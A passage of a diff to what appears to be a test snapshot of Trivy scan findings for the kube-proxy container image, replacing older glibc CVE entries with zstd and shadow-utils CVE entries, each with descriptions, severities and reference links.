"https://linux.oracle.com/cve/CVE-2021-3326.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4899", + "installedVersion": "1.4.8+dfsg-2.1", + "packageName": "libzstd1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-4899", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "https://github.com/facebook/zstd/issues/3200", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "https://www.cve.org/CVERecord?id=CVE-2022-4899", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "buffer overrun in util.c", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-4899", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4899", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://github.com/facebook/zstd/issues/3200", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", + ], + }, + "category": "Vulnerability", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "references": [ { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://issues.rpath.com/browse/RPL-1825", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2016-10228", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "login", "references": [ - "http://openwall.com/lists/oss-security/2017/03/01/10", - "http://www.securityfocus.com/bid/96525", - "https://access.redhat.com/security/cve/CVE-2016-10228", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", - "https://linux.oracle.com/cve/CVE-2016-10228.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", - "https://security.gentoo.org/glsa/202101-20", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2016-10228", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", ], }, "category": "Vulnerability", - "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: iconv program can hang when invoked with the -c option", + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2016-10228", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/03/01/10", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/96525", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2016-10228", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", + "value": "https://github.com/shadow-maint/shadow/pull/199", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://github.com/void-linux/void-packages/pull/17580", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://security.gentoo.org/glsa/202008-09", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "login", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + ], + }, + "category": "Vulnerability", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Improper input validation in shadow-utils package utility chfn", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202101-20", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + }, + { + "type": "URL", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-25013", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-5686", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-25013", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - "https://linux.oracle.com/cve/CVE-2019-25013.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", - "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210205-0004/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2019-25013", - "https://www.oracle.com/security-alerts/cpuapr2022.html", + "http://secunia.com/advisories/27215", + "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "http://www.securityfocus.com/bid/26048", + "http://www.vupen.com/english/advisories/2007/3474", + "https://issues.rpath.com/browse/RPL-1825", ], }, "category": "Vulnerability", - "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", + "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-25013", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2007-5686", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "value": "http://secunia.com/advisories/27215", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "value": "http://www.securityfocus.com/bid/26048", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "value": "http://www.vupen.com/english/advisories/2007/3474", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "value": "https://issues.rpath.com/browse/RPL-1825", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4235", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", + ], + }, + "category": "Vulnerability", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-10029", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", - "https://access.redhat.com/security/cve/CVE-2020-10029", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", - "https://linux.oracle.com/cve/CVE-2020-10029.html", - "https://linux.oracle.com/errata/ELSA-2021-0348.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", - "https://security.gentoo.org/glsa/202006-04", - "https://security.netapp.com/advisory/ntap-20200327-0003/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2020-10029", + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + 